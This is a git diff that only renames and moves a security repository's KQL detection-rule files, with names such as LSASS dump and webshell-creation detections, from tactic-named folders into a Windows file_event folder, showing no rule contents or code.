diff --git a/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql b/KQL/rules/windows/file/file_event/hijack_legit_rdp_session_to_move_laterally.kql
similarity index 100%
rename from KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql
rename to KQL/rules/windows/file/file_event/hijack_legit_rdp_session_to_move_laterally.kql
diff --git a/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql b/KQL/rules/windows/file/file_event/installation_of_teamviewer_desktop.kql
similarity index 100%
rename from KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql
rename to KQL/rules/windows/file/file_event/installation_of_teamviewer_desktop.kql
diff --git a/KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql b/KQL/rules/windows/file/file_event/iso_file_created_within_temp_folders.kql
similarity index 100%
rename from KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql
rename to KQL/rules/windows/file/file_event/iso_file_created_within_temp_folders.kql
diff --git a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql b/KQL/rules/windows/file/file_event/iso_or_image_mount_indicator_in_recent_files.kql
similarity index 100%
rename from KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql
rename to KQL/rules/windows/file/file_event/iso_or_image_mount_indicator_in_recent_files.kql
diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_archive.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/legitimate_application_dropped_archive.kql
rename to KQL/rules/windows/file/file_event/legitimate_application_dropped_archive.kql
diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_executable.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/legitimate_application_dropped_executable.kql
rename to KQL/rules/windows/file/file_event/legitimate_application_dropped_executable.kql
diff --git a/KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_script.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/legitimate_application_dropped_script.kql
rename to KQL/rules/windows/file/file_event/legitimate_application_dropped_script.kql
diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation.kql b/KQL/rules/windows/file/file_event/livekd_driver_creation.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/livekd_driver_creation.kql
rename to KQL/rules/windows/file/file_event/livekd_driver_creation.kql
diff --git a/KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/livekd_driver_creation_by_uncommon_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/livekd_driver_creation_by_uncommon_process.kql
rename to KQL/rules/windows/file/file_event/livekd_driver_creation_by_uncommon_process.kql
diff --git a/KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql b/KQL/rules/windows/file/file_event/livekd_kernel_memory_dump_file_created.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/livekd_kernel_memory_dump_file_created.kql
rename to KQL/rules/windows/file/file_event/livekd_kernel_memory_dump_file_created.kql
diff --git a/KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql b/KQL/rules/windows/file/file_event/lsass_process_dump_artefact_in_crashdumps_folder.kql
similarity index 100%
rename from KQL/rules/Credential Access/lsass_process_dump_artefact_in_crashdumps_folder.kql
rename to KQL/rules/windows/file/file_event/lsass_process_dump_artefact_in_crashdumps_folder.kql
diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
similarity index 100%
rename from KQL/rules/Credential Access/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
rename to KQL/rules/windows/file/file_event/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
diff --git a/KQL/rules/Credential Access/lsass_process_memory_dump_files.kql b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_files.kql
similarity index 100%
rename from KQL/rules/Credential Access/lsass_process_memory_dump_files.kql
rename to KQL/rules/windows/file/file_event/lsass_process_memory_dump_files.kql
diff --git a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql b/KQL/rules/windows/file/file_event/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
similarity index 100%
rename from KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
rename to KQL/rules/windows/file/file_event/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
diff --git a/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql b/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql
similarity index 100%
rename from KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql
rename to KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql
diff --git a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql b/KQL/rules/windows/file/file_event/new_custom_shim_database_created.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql
rename to KQL/rules/windows/file/file_event/new_custom_shim_database_created.kql
diff --git a/KQL/rules/Privilege Escalation/new_outlook_macro_created.kql b/KQL/rules/windows/file/file_event/new_outlook_macro_created.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/new_outlook_macro_created.kql
rename to KQL/rules/windows/file/file_event/new_outlook_macro_created.kql
diff --git a/KQL/rules/Credential Access/ntds_dit_created.kql b/KQL/rules/windows/file/file_event/ntds_dit_created.kql
similarity index 100%
rename from KQL/rules/Credential Access/ntds_dit_created.kql
rename to KQL/rules/windows/file/file_event/ntds_dit_created.kql
diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_parent_process.kql
similarity index 100%
rename from KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_parent_process.kql
rename to KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_parent_process.kql
diff --git a/KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_process.kql
similarity index 100%
rename from KQL/rules/Credential Access/ntds_dit_creation_by_uncommon_process.kql
rename to KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_process.kql
diff --git a/KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql b/KQL/rules/windows/file/file_event/ntds_exfiltration_filename_patterns.kql
similarity index 100%
rename from KQL/rules/Credential Access/ntds_exfiltration_filename_patterns.kql
rename to KQL/rules/windows/file/file_event/ntds_exfiltration_filename_patterns.kql
diff --git a/KQL/rules/Initial Access/octopus_scanner_malware.kql b/KQL/rules/windows/file/file_event/octopus_scanner_malware.kql
similarity index 100%
rename from KQL/rules/Initial Access/octopus_scanner_malware.kql
rename to KQL/rules/windows/file/file_event/octopus_scanner_malware.kql
diff --git a/KQL/rules/Initial Access/office_macro_file_creation.kql b/KQL/rules/windows/file/file_event/office_macro_file_creation.kql
similarity index 100%
rename from KQL/rules/Initial Access/office_macro_file_creation.kql
rename to KQL/rules/windows/file/file_event/office_macro_file_creation.kql
diff --git a/KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql b/KQL/rules/windows/file/file_event/office_macro_file_creation_from_suspicious_process.kql
similarity index 100%
rename from KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql
rename to KQL/rules/windows/file/file_event/office_macro_file_creation_from_suspicious_process.kql
diff --git a/KQL/rules/Initial Access/office_macro_file_download.kql b/KQL/rules/windows/file/file_event/office_macro_file_download.kql
similarity index 100%
rename from KQL/rules/Initial Access/office_macro_file_download.kql
rename to KQL/rules/windows/file/file_event/office_macro_file_download.kql
diff --git a/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/windows/file/file_event/onenote_attachment_file_dropped_in_suspicious_location.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql
rename to KQL/rules/windows/file/file_event/onenote_attachment_file_dropped_in_suspicious_location.kql
diff --git a/KQL/rules/Execution/pcre_net_package_temp_files.kql b/KQL/rules/windows/file/file_event/pcre_net_package_temp_files.kql
similarity index 100%
rename from KQL/rules/Execution/pcre_net_package_temp_files.kql
rename to KQL/rules/windows/file/file_event/pcre_net_package_temp_files.kql
diff --git a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql b/KQL/rules/windows/file/file_event/pdf_file_created_by_regedit_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql
rename to KQL/rules/windows/file/file_event/pdf_file_created_by_regedit_exe.kql
diff --git a/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql b/KQL/rules/windows/file/file_event/potential_binary_or_script_dropper_via_powershell.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql
rename to KQL/rules/windows/file/file_event/potential_binary_or_script_dropper_via_powershell.kql
diff --git a/KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql b/KQL/rules/windows/file/file_event/potential_dcom_internetexplorer_application_dll_hijack.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql
rename to KQL/rules/windows/file/file_event/potential_dcom_internetexplorer_application_dll_hijack.kql
diff --git a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql b/KQL/rules/windows/file/file_event/potential_file_extension_spoofing_using_right_to_left_override.kql
similarity index 100%
rename from KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql
rename to KQL/rules/windows/file/file_event/potential_file_extension_spoofing_using_right_to_left_override.kql
diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql b/KQL/rules/windows/file/file_event/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
rename to KQL/rules/windows/file/file_event/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql b/KQL/rules/windows/file/file_event/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
rename to KQL/rules/windows/file/file_event/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
diff --git a/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql b/KQL/rules/windows/file/file_event/potential_initial_access_via_dll_search_order_hijacking.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql
rename to KQL/rules/windows/file/file_event/potential_initial_access_via_dll_search_order_hijacking.kql
diff --git a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql b/KQL/rules/windows/file/file_event/potential_persistence_attempt_via_errorhandler_cmd.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql
rename to KQL/rules/windows/file/file_event/potential_persistence_attempt_via_errorhandler_cmd.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_add_in.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql
rename to KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_add_in.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_startup_folder.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql
rename to KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_startup_folder.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_notepad_plugins.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql
rename to KQL/rules/windows/file/file_event/potential_persistence_via_notepad_plugins.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_outlook_form.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_outlook_form.kql
rename to KQL/rules/windows/file/file_event/potential_persistence_via_outlook_form.kql
diff --git a/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql b/KQL/rules/windows/file/file_event/potential_privilege_escalation_attempt_via_exe_local_technique.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql
rename to KQL/rules/windows/file/file_event/potential_privilege_escalation_attempt_via_exe_local_technique.kql
diff --git a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql b/KQL/rules/windows/file/file_event/potential_ripzip_attack_on_startup_folder.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql
rename to KQL/rules/windows/file/file_event/potential_ripzip_attack_on_startup_folder.kql
diff --git a/KQL/rules/Credential Access/potential_sam_database_dump.kql b/KQL/rules/windows/file/file_event/potential_sam_database_dump.kql
similarity index 100%
rename from KQL/rules/Credential Access/potential_sam_database_dump.kql
rename to KQL/rules/windows/file/file_event/potential_sam_database_dump.kql
diff --git a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql b/KQL/rules/windows/file/file_event/potential_startup_shortcut_persistence_via_powershell_exe.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql
rename to KQL/rules/windows/file/file_event/potential_startup_shortcut_persistence_via_powershell_exe.kql
diff --git a/KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql b/KQL/rules/windows/file/file_event/potential_suspicious_powershell_module_file_created.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql
rename to KQL/rules/windows/file/file_event/potential_suspicious_powershell_module_file_created.kql
diff --git a/KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql b/KQL/rules/windows/file/file_event/potential_webshell_creation_on_static_website.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql
rename to KQL/rules/windows/file/file_event/potential_webshell_creation_on_static_website.kql
diff --git a/KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql b/KQL/rules/windows/file/file_event/potential_winnti_dropper_activity.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potential_winnti_dropper_activity.kql
rename to KQL/rules/windows/file/file_event/potential_winnti_dropper_activity.kql
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql b/KQL/rules/windows/file/file_event/potentially_suspicious_dmp_hdmp_file_creation.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potentially_suspicious_dmp_hdmp_file_creation.kql
rename to KQL/rules/windows/file/file_event/potentially_suspicious_dmp_hdmp_file_creation.kql
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql
rename to KQL/rules/windows/file/file_event/potentially_suspicious_wdac_policy_file_creation.kql
diff --git a/KQL/rules/Persistence/powershell_module_file_created.kql b/KQL/rules/windows/file/file_event/powershell_module_file_created.kql
similarity index 100%
rename from KQL/rules/Persistence/powershell_module_file_created.kql
rename to KQL/rules/windows/file/file_event/powershell_module_file_created.kql
diff --git a/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql b/KQL/rules/windows/file/file_event/powershell_module_file_created_by_non_powershell_process.kql
similarity index 100%
rename from KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql
rename to KQL/rules/windows/file/file_event/powershell_module_file_created_by_non_powershell_process.kql
diff --git a/KQL/rules/Persistence/powershell_profile_modification.kql b/KQL/rules/windows/file/file_event/powershell_profile_modification.kql
similarity index 100%
rename from KQL/rules/Persistence/powershell_profile_modification.kql
rename to KQL/rules/windows/file/file_event/powershell_profile_modification.kql
diff --git a/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql b/KQL/rules/windows/file/file_event/powershell_script_dropped_via_powershell_exe.kql
similarity index 100%
rename from KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql
rename to KQL/rules/windows/file/file_event/powershell_script_dropped_via_powershell_exe.kql
diff --git a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/windows/file/file_event/process_explorer_driver_creation_by_non_sysinternals_binary.kql
similarity index 100%
rename from KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql
rename to KQL/rules/windows/file/file_event/process_explorer_driver_creation_by_non_sysinternals_binary.kql
diff --git a/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/windows/file/file_event/process_monitor_driver_creation_by_non_sysinternals_binary.kql
similarity index 100%
rename from KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql
rename to KQL/rules/windows/file/file_event/process_monitor_driver_creation_by_non_sysinternals_binary.kql
diff --git a/KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql b/KQL/rules/windows/file/file_event/psexec_remote_execution_file_artefact.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql
rename to KQL/rules/windows/file/file_event/psexec_remote_execution_file_artefact.kql
diff --git a/KQL/rules/Execution/psexec_service_file_creation.kql b/KQL/rules/windows/file/file_event/psexec_service_file_creation.kql
similarity index 100%
rename from KQL/rules/Execution/psexec_service_file_creation.kql
rename to KQL/rules/windows/file/file_event/psexec_service_file_creation.kql
diff --git a/KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/psscriptpolicytest_creation_by_uncommon_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/psscriptpolicytest_creation_by_uncommon_process.kql
rename to KQL/rules/windows/file/file_event/psscriptpolicytest_creation_by_uncommon_process.kql
diff --git a/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/windows/file/file_event/publisher_attachment_file_dropped_in_suspicious_location.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql
rename to KQL/rules/windows/file/file_event/publisher_attachment_file_dropped_in_suspicious_location.kql
diff --git a/KQL/rules/Exfiltration/rclone_config_file_creation.kql b/KQL/rules/windows/file/file_event/rclone_config_file_creation.kql
similarity index 100%
rename from KQL/rules/Exfiltration/rclone_config_file_creation.kql
rename to KQL/rules/windows/file/file_event/rclone_config_file_creation.kql
diff --git a/KQL/rules/Execution/remcom_service_file_creation.kql b/KQL/rules/windows/file/file_event/remcom_service_file_creation.kql
similarity index 100%
rename from KQL/rules/Execution/remcom_service_file_creation.kql
rename to KQL/rules/windows/file/file_event/remcom_service_file_creation.kql
diff --git a/KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql b/KQL/rules/windows/file/file_event/remote_access_tool_screenconnect_temporary_file.kql
similarity index 100%
rename from KQL/rules/Execution/remote_access_tool_screenconnect_temporary_file.kql
rename to KQL/rules/windows/file/file_event/remote_access_tool_screenconnect_temporary_file.kql
diff --git a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules/windows/file/file_event/renamed_vscode_code_tunnel_execution_file_indicator.kql
similarity index 100%
rename from KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql
rename to KQL/rules/windows/file/file_event/renamed_vscode_code_tunnel_execution_file_indicator.kql
diff --git a/KQL/rules/Defense Evasion/scr_file_write_event.kql b/KQL/rules/windows/file/file_event/scr_file_write_event.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/scr_file_write_event.kql
rename to KQL/rules/windows/file/file_event/scr_file_write_event.kql
diff --git a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql b/KQL/rules/windows/file/file_event/screenconnect_temporary_installation_artefact.kql
similarity index 100%
rename from KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql
rename to KQL/rules/windows/file/file_event/screenconnect_temporary_installation_artefact.kql
diff --git a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql b/KQL/rules/windows/file/file_event/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
rename to KQL/rules/windows/file/file_event/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
diff --git a/KQL/rules/Privilege Escalation/startup_folder_file_write.kql b/KQL/rules/windows/file/file_event/startup_folder_file_write.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/startup_folder_file_write.kql
rename to KQL/rules/windows/file/file_event/startup_folder_file_write.kql
diff --git a/KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql b/KQL/rules/windows/file/file_event/suspicious_aspx_file_drop_by_exchange.kql
similarity index 100%
rename from KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql
rename to KQL/rules/windows/file/file_event/suspicious_aspx_file_drop_by_exchange.kql
diff --git a/KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql b/KQL/rules/windows/file/file_event/suspicious_binaries_and_scripts_in_public_folder.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql
rename to KQL/rules/windows/file/file_event/suspicious_binaries_and_scripts_in_public_folder.kql
diff --git a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql b/KQL/rules/windows/file/file_event/suspicious_binary_writes_via_anydesk.kql
similarity index 100%
rename from KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql
rename to KQL/rules/windows/file/file_event/suspicious_binary_writes_via_anydesk.kql
diff --git a/KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql b/KQL/rules/windows/file/file_event/suspicious_creation_txt_file_in_user_desktop.kql
similarity index 100%
rename from KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql
rename to KQL/rules/windows/file/file_event/suspicious_creation_txt_file_in_user_desktop.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql b/KQL/rules/windows/file/file_event/suspicious_creation_with_colorcpl.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_creation_with_colorcpl.kql
rename to KQL/rules/windows/file/file_event/suspicious_creation_with_colorcpl.kql
diff --git a/KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql b/KQL/rules/windows/file/file_event/suspicious_deno_file_written_from_remote_source.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql
rename to KQL/rules/windows/file/file_event/suspicious_deno_file_written_from_remote_source.kql
diff --git a/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql b/KQL/rules/windows/file/file_event/suspicious_desktop_ini_action.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql
rename to KQL/rules/windows/file/file_event/suspicious_desktop_ini_action.kql
diff --git a/KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql b/KQL/rules/windows/file/file_event/suspicious_desktopimgdownldr_target_file.kql
similarity index 100%
rename from KQL/rules/Command and Control/suspicious_desktopimgdownldr_target_file.kql
rename to KQL/rules/windows/file/file_event/suspicious_desktopimgdownldr_target_file.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_double_extension_files.kql b/KQL/rules/windows/file/file_event/suspicious_double_extension_files.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_double_extension_files.kql
rename to KQL/rules/windows/file/file_event/suspicious_double_extension_files.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql b/KQL/rules/windows/file/file_event/suspicious_executable_file_creation.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_executable_file_creation.kql
rename to KQL/rules/windows/file/file_event/suspicious_executable_file_creation.kql
diff --git a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_in_outlook_temporary_directory.kql
similarity index 100%
rename from KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql
rename to KQL/rules/windows/file/file_event/suspicious_file_created_in_outlook_temporary_directory.kql
diff --git a/KQL/rules/Execution/suspicious_file_created_in_perflogs.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_in_perflogs.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_file_created_in_perflogs.kql
rename to KQL/rules/windows/file/file_event/suspicious_file_created_in_perflogs.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_via_onenote_application.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_file_created_via_onenote_application.kql
rename to KQL/rules/windows/file/file_event/suspicious_file_created_via_onenote_application.kql
diff --git a/KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql b/KQL/rules/windows/file/file_event/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
similarity index 100%
rename from KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
rename to KQL/rules/windows/file/file_event/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql b/KQL/rules/windows/file/file_event/suspicious_file_creation_in_uncommon_appdata_folder.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql
rename to KQL/rules/windows/file/file_event/suspicious_file_creation_in_uncommon_appdata_folder.kql
diff --git a/KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql b/KQL/rules/windows/file/file_event/suspicious_file_drop_by_exchange.kql
similarity index 100%
rename from KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql
rename to KQL/rules/windows/file/file_event/suspicious_file_drop_by_exchange.kql
diff --git a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_write_to_sharepoint_layouts_directory.kql
similarity index 100%
rename from KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql
rename to KQL/rules/windows/file/file_event/suspicious_file_write_to_sharepoint_layouts_directory.kql
diff --git a/KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_write_to_webapps_root_directory.kql
similarity index 100%
rename from KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql
rename to KQL/rules/windows/file/file_event/suspicious_file_write_to_webapps_root_directory.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql b/KQL/rules/windows/file/file_event/suspicious_files_in_default_gpo_folder.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql
rename to KQL/rules/windows/file/file_event/suspicious_files_in_default_gpo_folder.kql
diff --git a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql b/KQL/rules/windows/file/file_event/suspicious_get_variable_exe_creation.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql
rename to KQL/rules/windows/file/file_event/suspicious_get_variable_exe_creation.kql
diff --git a/KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql b/KQL/rules/windows/file/file_event/suspicious_interactive_powershell_as_system.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql
rename to KQL/rules/windows/file/file_event/suspicious_interactive_powershell_as_system.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql b/KQL/rules/windows/file/file_event/suspicious_lnk_double_extension_file_created.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql
rename to KQL/rules/windows/file/file_event/suspicious_lnk_double_extension_file_created.kql
diff --git a/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql b/KQL/rules/windows/file/file_event/suspicious_msexchangemailboxreplication_aspx_write.kql
similarity index 100%
rename from KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql
rename to KQL/rules/windows/file/file_event/suspicious_msexchangemailboxreplication_aspx_write.kql
diff --git a/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql b/KQL/rules/windows/file/file_event/suspicious_outlook_macro_created.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql
rename to KQL/rules/windows/file/file_event/suspicious_outlook_macro_created.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql b/KQL/rules/windows/file/file_event/suspicious_procexp152_sys_file_created_in_tmp.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_procexp152_sys_file_created_in_tmp.kql
rename to KQL/rules/windows/file/file_event/suspicious_procexp152_sys_file_created_in_tmp.kql
